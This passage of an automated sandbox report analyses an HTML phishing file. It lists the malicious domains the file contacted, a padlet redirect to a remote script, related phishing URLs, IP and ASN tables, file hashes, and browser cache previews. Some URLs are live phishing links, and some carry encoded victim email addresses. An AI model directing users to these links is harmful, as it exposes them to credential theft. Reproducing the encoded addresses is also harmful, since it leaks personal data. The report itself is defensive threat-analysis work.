_4040._https.server.povbtech.store	unknown	unknown	false	unknown
logo.clearbit.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sopbtech.store/start/xls/images/key.png	false	Avira URL Cloud: safe	unknown
https://sopbtech.store/start/xls/includes/css6.css	false	Avira URL Cloud: safe	unknown
https://wexclet.store/0xa937eg29be0xcss.js	true	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/022%200.10.htm	true	Avira URL Cloud: safe	unknown
https://padlet.com/redirect?url=https%3A%2F%2Fwexclet.store%2F0xa937eg29be0xcss.js	false	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.1.1.min.js	false	URL Reputation: safe	unknown
https://api.ipify.org/?format=json	false	URL Reputation: safe	unknown
https://logo.clearbit.com/buildtosuitinc.com	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://getbootstrap.com)	chromecache_146.2.dr	false	Avira URL Cloud: safe	unknown
https://www.office.com	chromecache_150.2.dr	false	Avira URL Cloud: safe	unknown
https://api.ipify.org?format=json	chromecache_140.2.dr, chromecache_150.2.dr	false	Avira URL Cloud: safe	unknown
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_146.2.dr	false	Avira URL Cloud: safe	unknown
https://logo.clearbit.com/	chromecache_150.2.dr	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.18.42.238	padlet.com	United States	13335	CLOUDFLARENETUS	false
13.107.246.64	s-part-0036.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.42	s-part-0014.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
185.174.100.20	server.povbtech.store	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
3.165.206.76	d26p066pn2w0s0.cloudfront.net	United States	16509	AMAZON-02US	false
13.32.27.14	unknown	United States	7018	ATT-INTERNET4US	false
162.0.215.17	wexclet.store	Canada	35893	ACPCA	false
199.188.200.183	sopbtech.store	United States	22612	NAMECHEAP-NETUS	false
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1496973
Start date and time:	2024-08-21 23:16:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	022 0.10.htm renamed because original name is a hash value
Original Sample Name:	playback-message ______________________________ 0.10.htm
Detection:	MAL
Classification:	mal68.phis.winHTM@29/23@26/13
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.99, 108.177.15.84, 216.58.206.78, 216.58.206.42, 142.250.186.106, 34.104.35.123, 142.250.185.234, 142.250.185.170, 142.250.185.138, 142.250.185.202, 142.250.186.138, 142.250.186.170, 142.250.184.234, 142.250.185.106, 142.250.181.234, 172.217.23.106, 172.217.16.138, 216.58.212.138, 142.250.184.202, 142.250.186.74, 142.250.74.202, 142.250.185.74, 199.232.214.172, 192.229.221.95, 142.250.185.195, 142.250.181.238
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 022 0.10.htm

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.18.42.238	AP Credit_Note000381.html____	Get hash	malicious	HTMLPhisher	Browse
	https://padlet.com/redirect?url=https%3A%2F%2Fhofp.wintupple.com%2F	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://moldmakersinv-my.sharepoint.com/:f:/g/personal/tom_goodall_accordmfg_com/Eol0o11bEfNJhII1rKAZv-UBXeuyLTNJQzZrHmlW9Cvs2w?e=vBJdwv	Get hash	malicious	HTMLPhisher	Browse
	http://padlet.com/map0/qrl-4i3usnmugdtg1fy9	Get hash	malicious	Unknown	Browse
	https://padlet.com/gstanton8/my-spreadsheet637_geri-stanton968_march24_childers-schlueter-nssmij9u6qrx5sy5	Get hash	malicious	HTMLPhisher	Browse
	https://form.questionscout.com/65f304ba0f97805394312ead	Get hash	malicious	Unknown	Browse
	https://padlet.com/810serious/nhs-secure-center-ksga1fzigts58qql/wish/2917263095	Get hash	malicious	Unknown	Browse
	https://padlet.com/voicereceived2602/17180027621-dut4dexptqi0dpss	Get hash	malicious	Unknown	Browse
	https://padlet.com/redirect?url=https%3A%2F%2Fcloudflare-ipfs.com%2Fipfs%2Fbafkreidireckoznexfjfbsxswt7f6nvtvuhh43w7uthmbwiqbpqvcwfpny%20HTTP%20302	Get hash	malicious	Unknown	Browse
	https://padlet.com/redirect?url=https%3A%2F%2Fdelrightru.ru.net%2FTDmX9L53wc%2F	Get hash	malicious	HTMLPhisher	Browse
13.107.246.64	https://security.microsoft.com/url?url=https%3A%2F%2Fa.squareupmessaging.com%2FCL0%2Fhttps%3A%252F%252Fsquareup.com%252Fappointments%252Fbook%252Freservations%252Flsjjxjouevoob0%2F1%2F010101914ec58572-8559cad8-4e4f-4de0-90ee-58c7f3d0b233-000000%2FTJW_gpOkBzAJNq0B-EkMC9Swd_KZL7e3XjDAcGAj_Eo%3D366	Get hash	malicious	Unknown	Browse
	http://cr.thesafelink.co.uk/?rid=gyRJqbs	Get hash	malicious	Unknown	Browse
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	Unknown	Browse
	DOC-91295804.pdf	Get hash	malicious	HTMLPhisher	Browse
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	Unknown	Browse
	CDMS User Manual.pdf	Get hash	malicious	Unknown	Browse
	http://www.jumbo.cl	Get hash	malicious	Unknown	Browse
	PO114450.xla.xlsx	Get hash	malicious	Unknown	Browse
	http://tycfdty5623fgcw.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	http://pub-0603927d81c44c29945d86c4d44687c5.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse
13.107.246.42	https://protect-us.mimecast.com/s/FVibCzpzxLsxEMXAhgAOBC	Get hash	malicious	Unknown	Browse	www.mimecast.com/Customers/Support/Contact-support/
	http://border-fd.smartertechnologies.com/	Get hash	malicious	Unknown	Browse	border-fd.smartertechnologies.com/
	https://protect-us.mimecast.com/s/4MrPCrkvgotDWxrNCzxa8p	Get hash	malicious	Unknown	Browse	www.mimecast.com/
13.32.27.14	https://ctrk.klclick3.com/l/01J4VBDYF35C1328WG2H0379BW_0	Get hash	malicious	Unknown	Browse
	http://pub-de070dc664904ed28782265ba717e609.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse
	View Invoice#98783859 Statement for dpo.lu.htm	Get hash	malicious	HTMLPhisher	Browse
	https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9iYW5kcm9mZkBzaWduYWxkYy5jb20=	Get hash	malicious	HTMLPhisher	Browse
	https://pub-bc1e99c17d21413c8c62ead228907d1f.r2.dev/auth_gen.html?folder=inf0gudkij&module&user-agent=Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.75+Safari/537.36	Get hash	malicious	Greatness Phishing Kit, HTMLPhisher	Browse
	http://trusting-whoever-066249.framer.app	Get hash	malicious	Unknown	Browse
	https://seafood.media/fis/shared/redirect.asp?banner=6158&url=https://app.postbeyond.com/api/v2/track/url?url=https://gateway.lighthouse.storage/ipfs/bafkreibdyrffcfgrvefesfo6lsxyipwjxsv5r2d3pwwtbn5gauzuyvpcky#bmVpbF93aWxsaWFtc0BmZC5vcmc=	Get hash	malicious	HTMLPhisher	Browse
	https://zombero.com/css/app/?client-request-id=adam.nevin@zendesk.com	Get hash	malicious	HTMLPhisher	Browse
	https://materialesvite.com.mx/upload/QebqNQebqN/QebqN/YWxiZXJ0by5kb3Npb0B0aGFsZXNhbGVuaWFzcGFjZS5jb20=	Get hash	malicious	Greatness Phishing Kit, HTMLPhisher	Browse
	https://materialesvite.com.mx/upload/QebqNQebqN/QebqN/YWxiZXJ0by5kb3Npb0B0aGFsZXNhbGVuaWFzcGFjZS5jb20=	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0014.t-0009.t-msedge.net	https://t.ly/VwQzN	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://mscom-mkt-prod135-t.adobe-campaign.com/r/?id=h1d799db,3d4ea2a,3d4ea2c&e=cDE9QG9zdlI3S2EwMGd4WGp5YXcxYWNRc3pDUU9GN3MwU2hzM2sweEpLYjEwZzNiUERYTDAtZUMwdHJRRWc3dHN1dXRNQmhWWWtWN0tyWkpmaDNBd2FtZnc2X2JWNnk4TE1PeEtwRXN2V2RnTkY5Rk13dFc&s=b4eT0hjhEXSLupJUbVuWEmZ9wVqdrJyG5oe8ap8okjM	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://emea.dcv.ms/iFQEBBe6Ed	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://emea.dcv.ms/iFQEBBe6Ed	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://www.lusha.com/privacy_topic/control-your-profile/	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://security.microsoft.com/url?url=https%3A%2F%2Fa.squareupmessaging.com%2FCL0%2Fhttps%3A%252F%252Fsquareup.com%252Fappointments%252Fbook%252Freservations%252Flsjjxjouevoob0%2F1%2F010101914ec58572-8559cad8-4e4f-4de0-90ee-58c7f3d0b233-000000%2FTJW_gpOkBzAJNq0B-EkMC9Swd_KZL7e3XjDAcGAj_Eo%3D366	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://us.codecodefor.com/do?payload=eyJzZXNzaW9uX3V1aWQiOiI3NmE4NmFlZS04NmQwLTQxMzMtYjE3MC01ZTc4MzQ5MTRiOWMiLCJ3b3JrZXJfaG9zdCI6IjEzNi4yNDMuMTQ1LjYyIiwiZmVlZF9pZCI6MTc2NiwidGltZXN0YW1wIjoxNzIwMTIzMzM0fQ==&exo_cid=6400902&exffir=eyJjIjoiZTMzNDM1MDhiN2E0NzljM2ZmNTk2MDNjNDBhNzBkMWUiLCJ0IjoiMSIsInNyIjoiMTUzNng4NjQiLCJjciI6IjE1MzZ4NzMwIiwiaSI6IjAifQ--	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	Unknown	Browse	13.107.246.42
code.jquery.com	https://t.ly/VwQzN	Get hash	malicious	Unknown	Browse	151.101.66.137
	https://t.ly/VwQzN	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://t.ly/VwQzN	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://pblc.me/pub/2b3f5be8927eb1	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	http://www.galeriaetterem.hu/modules/babel/redirect.php?newlang=en_US&newurl=https://medium.com/m/global-identity-2?redirectUrl=https://funwavefoods.com/wp/index.html	Get hash	malicious	Unknown	Browse	151.101.2.137
	http://www.pro-pharma.co.uk	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://benyera.com/workprojects/index.php	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	http://pub-d620f24ef64649b0876f703b7f210400.r2.dev/index.html	Get hash	malicious	Unknown	Browse	151.101.130.137
	INVhttps___worker-rough-fire-759a.berwieberwieberwieberwieberwie.workers.dev__eba=.html	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	http://www.galeriaetterem.hu/modules/babel/redirect.php?newlang=en_US&newurl=https://medium.com/m/global-identity-2?redirectUrl=https://flsgiobal.com/index(3).html	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
padlet.com	https://padlet.com/cmagobet1/this-is-a-secured-document-please-access-below-7olcntki8boobypx	Get hash	malicious	Unknown	Browse	104.18.4.151
	https://padlet.com/gxbb1/13-08-ldb22p3ta92d07ev	Get hash	malicious	Unknown	Browse	104.18.4.151
	https://padlet.com/chuck55/pdf-online-document-69sdfw7szsxtydr0	Get hash	malicious	Unknown	Browse	104.18.4.151
	AP Credit_Note000381.html____	Get hash	malicious	HTMLPhisher	Browse	104.18.42.238
	https://padlet.com/redirect?url=https%3A%2F%2Fhofp.wintupple.com%2F	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.18.42.238
	RE_ Toyotalift Northeast_May28.eml	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.18.42.238
	https://moldmakersinv-my.sharepoint.com/:f:/g/personal/tom_goodall_accordmfg_com/Eol0o11bEfNJhII1rKAZv-UBXeuyLTNJQzZrHmlW9Cvs2w?e=vBJdwv	Get hash	malicious	HTMLPhisher	Browse	104.18.42.238
	https://padlet.com/pginsberg/moskowitz-colson-ginsberg-schulman-ews1h2hqyec6vbw8	Get hash	malicious	Unknown	Browse	172.64.145.18
	http://padlet.com/map0/qrl-4i3usnmugdtg1fy9	Get hash	malicious	Unknown	Browse	172.64.145.18
	https://padlet.com/gstanton8/my-spreadsheet637_geri-stanton968_march24_childers-schlueter-nssmij9u6qrx5sy5	Get hash	malicious	HTMLPhisher	Browse	172.64.145.18
d26p066pn2w0s0.cloudfront.net	https://cargalo.com.pe/url/update.html	Get hash	malicious	HTMLPhisher	Browse	3.165.190.34
	http://pub-fc8b0b1383ea4606af992d0e7ffe6e9a.r2.dev/auth_gen.html	Get hash	malicious	Unknown	Browse	13.32.27.77
	https://pariscope.com.au/robots.html?colors=YmxhbmdlQGplZmZwYXJpc2gubmV0	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	18.239.36.50
	http://pub-c00e6b233835461aa39db2b6b030abc8.r2.dev/bbb2.html	Get hash	malicious	HTMLPhisher	Browse	18.239.36.32
	https://staging.d1suhxp7nxddnj.amplifyapp.com/	Get hash	malicious	HTMLPhisher	Browse	3.165.190.72
	http://pub-905beb8d29144993af2d899668b8014d.r2.dev/auth_gen.html	Get hash	malicious	Unknown	Browse	18.239.36.13
	https://ctrk.klclick3.com/l/01J4VBDYF35C1328WG2H0379BW_0	Get hash	malicious	Unknown	Browse	13.32.27.14
	https://ebay.onelink.me/TAsm?3ihwpid=Email&c=CM_Incentives_App-only_program&Country=UK&af_web_dp=https://brandequity.economictimes.indiatimes.com.////etl.php?url=https://x26x.com/banks/neil//ksjgk7wemnbo03lhbbkzwog/ai5lbGtvdWJ5bGVjbGVyY3FAc2JtLm1j	Get hash	malicious	HTMLPhisher	Browse	13.32.27.44
	Fw Received Commande.eml	Get hash	malicious	HTMLPhisher	Browse	13.32.27.77
	http://pub-de070dc664904ed28782265ba717e609.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	13.32.27.44

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	22.08.2024.exe	Get hash	malicious	Xmrig	Browse	104.16.185.241
	yyTqxbOXbF.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.20.4.235
	SecuriteInfo.com.Win64.MalwareX-gen.29811.31558.exe	Get hash	malicious	Unknown	Browse	104.26.1.5
	SecuriteInfo.com.Win64.SpywareX-gen.26829.18381.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exe	Get hash	malicious	LummaC	Browse	104.21.17.213
	https://docsend.com/view/im8ephxwm6r4w526	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://online.stat.tamu.edu/	Get hash	malicious	Unknown	Browse	172.67.75.215
	https://bridge.metalsart.in/Webmail/webmail.php?email=3Dmshaw@ci.scarborough.me.us	Get hash	malicious	Unknown	Browse	1.1.1.1
	Tweak.reg	Get hash	malicious	LummaC	Browse	172.67.132.84
	https://t.ly/VwQzN	Get hash	malicious	Unknown	Browse	104.20.7.133
ASN-QUADRANET-GLOBALUS	tppc.elf	Get hash	malicious	Unknown	Browse	156.239.31.199
	ExeFile (278).exe	Get hash	malicious	Emotet	Browse	203.25.159.3
	GtZtVa7XV8.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	64.188.9.172
	EUR Swift Bildirimi12-08-2024.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	T6LMJUoWLy.exe	Get hash	malicious	RedLine	Browse	162.218.211.195
	DHL AWB No 8023000.cmd.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	162.218.211.195
	INQUIRY#84790-AUGUST24.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	64.188.18.85
	https://t.ly/Jo2X0	Get hash	malicious	HTMLPhisher	Browse	23.152.0.52
	http://www.bilgebag.com/targo/	Get hash	malicious	Unknown	Browse	104.247.173.252
	SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.8296.30254.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	67.215.224.135
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://t.ly/VwQzN	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://burtpro-my.sharepoint.com/:f:/g/personal/bensmall_burtprocess_com/EjQqDBTPgTNIiAkareSOQFsBzQwuEIsE-StghZpYw03_2g?e=c16mWb	Get hash	malicious	HTMLPhisher	Browse	40.101.136.2
	https://www.dropbox.com/l/scl/AAB-caRhWqrML98bRdmDd16YpJdQGQoNwfM	Get hash	malicious	Unknown	Browse	150.171.22.12
	firmware.i686.elf	Get hash	malicious	Unknown	Browse	20.162.137.242
	firmware.m68k.elf	Get hash	malicious	Unknown	Browse	51.119.22.209
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	51.135.186.122
	firmware.powerpc.elf	Get hash	malicious	Unknown	Browse	51.111.189.53
	firmware.x86_64.elf	Get hash	malicious	Unknown	Browse	135.149.84.37
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	150.171.101.51
	Order PO Document.docx	Get hash	malicious	HTMLPhisher	Browse	52.109.76.243
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://t.ly/VwQzN	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://burtpro-my.sharepoint.com/:f:/g/personal/bensmall_burtprocess_com/EjQqDBTPgTNIiAkareSOQFsBzQwuEIsE-StghZpYw03_2g?e=c16mWb	Get hash	malicious	HTMLPhisher	Browse	40.101.136.2
	https://www.dropbox.com/l/scl/AAB-caRhWqrML98bRdmDd16YpJdQGQoNwfM	Get hash	malicious	Unknown	Browse	150.171.22.12
	firmware.i686.elf	Get hash	malicious	Unknown	Browse	20.162.137.242
	firmware.m68k.elf	Get hash	malicious	Unknown	Browse	51.119.22.209
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	51.135.186.122
	firmware.powerpc.elf	Get hash	malicious	Unknown	Browse	51.111.189.53
	firmware.x86_64.elf	Get hash	malicious	Unknown	Browse	135.149.84.37
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	150.171.101.51
	Order PO Document.docx	Get hash	malicious	HTMLPhisher	Browse	52.109.76.243

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://docsend.com/view/im8ephxwm6r4w526	Get hash	malicious	HTMLPhisher	Browse	40.127.169.103 184.28.90.27
	https://online.stat.tamu.edu/	Get hash	malicious	Unknown	Browse	40.127.169.103 184.28.90.27
	https://docs.google.com/drawings/d/1N4NWBuPWDwDTu1qvYSJKiN0OpMX3KTrYk5JrjraiLNw/preview?AVZmu	Get hash	malicious	Unknown	Browse	40.127.169.103 184.28.90.27
	https://t.ly/VwQzN	Get hash	malicious	Unknown	Browse	40.127.169.103 184.28.90.27
	https://czone.insprl.com/app/zendesk/zendesk/	Get hash	malicious	Unknown	Browse	40.127.169.103 184.28.90.27
	Play_VMNow-DotCOINC.html	Get hash	malicious	Unknown	Browse	40.127.169.103 184.28.90.27
	http://ib.adnxs.com/getuid?https%3a%2f%2fbeutopiantech.com/BUW739BSOBW-UBI803SJINX-39SJSON3830-HGJSIOW82839#TanRpbmdzdGFkQHNyYWxhYi5vcmc=	Get hash	malicious	Unknown	Browse	40.127.169.103 184.28.90.27
	http://bttr-llc.com	Get hash	malicious	Unknown	Browse	40.127.169.103 184.28.90.27
	https://www.google.com/url?q=https%3A%2F%2Fumayendustriyel.com%2Fn%2F%3Fc3Y9bzM2NV8xX25vbSZyYW5kPWJVdHpiRkk9JnVpZD1VU0VSMTkwODIwMjRVMTkwODE5MDU%3DN0123N%255BEMail%255D&sa=D&sntz=1&usg=AOvVaw14IvSatx3kaeiCgcMEtK-1	Get hash	malicious	Unknown	Browse	40.127.169.103 184.28.90.27
	message html.html	Get hash	malicious	HTMLPhisher	Browse	40.127.169.103 184.28.90.27

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 137

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	dropped
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 138

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	20
Entropy (8bit):	3.446439344671015
Encrypted:	false
SSDEEP:	3:YMb1gXMR4n:YMeXNn
MD5:	2E1E0B28D6E7522CB687E20D37BCD8AA
SHA1:	03D5EFE3719CAB433421C4D9BF6C73E0B8EB69E5
SHA-256:	124CE91528D8ACB894BDC980ABDDF035B38CDC64CE13F088D431E0B10D61FB24
SHA-512:	70BB31CA0F3907AB6B5860459643E422AAD6685F32D519C23E671CD46F29ABF2DB1F0C53E54313FF6FE7B54A75CDCA18A9232556B3273E6DB200BFCD22BA82BD
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://api.ipify.org/?format=json
Preview:	{"ip":"8.46.123.33"}

Chrome Cache Entry: 139

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	12878
Entropy (8bit):	7.978587556790113
Encrypted:	false
SSDEEP:	192:6DlxnmKCVFlzY4UIszy1EAuQRwZcStxiVmCauyrJosntlce7YvVNEY4pBxrVvhHp:oFCVvUN/p7QmfPM5tItl8I5pHp
MD5:	88F6ED750F26D42A89CDEA79DEE968EB
SHA1:	56DC83D8D2C52FA62CA823D6A5E6CFE54A82D1A4
SHA-256:	5D27AD132E2753B93F5C1DDF321BC0731563F64327CF0FBCFFB64E17D97CD91C
SHA-512:	A2E37BB90E0A06A8AC3645F0FC3A19AAA6E558DDA7316C2D8CA179A6FBC1B0FA61A559A64600273A6822338D41136A9B6E87F01839CE1464B08D0001B604A1AF
Malicious:	false
Reputation:	low
URL:	https://logo.clearbit.com/buildtosuitinc.com
Preview:	.PNG........IHDR.............L\....2.IDATx.....\.u...s..UUw....K7...p..p'Eq....-Eq.c;N...$.4^.I.xFqf.........x....I."...b!.b....B..F.U.{..........Z@.m.....z.=..s...x.L.....}.L.x...<.'.4...0..}.L.x...<.'.4...0.CO....hx....I.......1......~5{..i......c....iJ.A.?D...b1..@.l..&.=.p......{...3.....`.S.c......X(>P..~~...a...k..gl0N.Y.Ns...{T,..@......x!?.....c..K.........A..+D.J.j..r.!f...d..4.p.>. =...L@.2!...cq.4ko......a.`.....l.nD..IQ.....{..X.i......(.H.(R...b .NL67.3........2 .nP....S.{../...(...v...'.y.....8"+...W....(..`....L..3..^.z}.@c.....v.{~.mg.v..% ......K...mc.}..m].z..y..2.C.I.......+....^..)Afal.....ui.\|F..K.T3..-^~...W,...]......V.`L9.eO..S..{l..[.ML.NHC..n...>n4...j.8....y.Pw.r...A../.....+...?tx.....q@...%...Y.d...YFP..\.......:.....fQ.k).Z..[..vYO.m.e/.$.H...._5...6..f..M..!........'?....................1.q"Kml..j...^....#.l%6.:.....Y.../...~.7...J..t'.:.m.~.S...Sel%.....\...g~. .V..<......AM....i...r...lr...{{.......m.R..

Chrome Cache Entry: 140

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
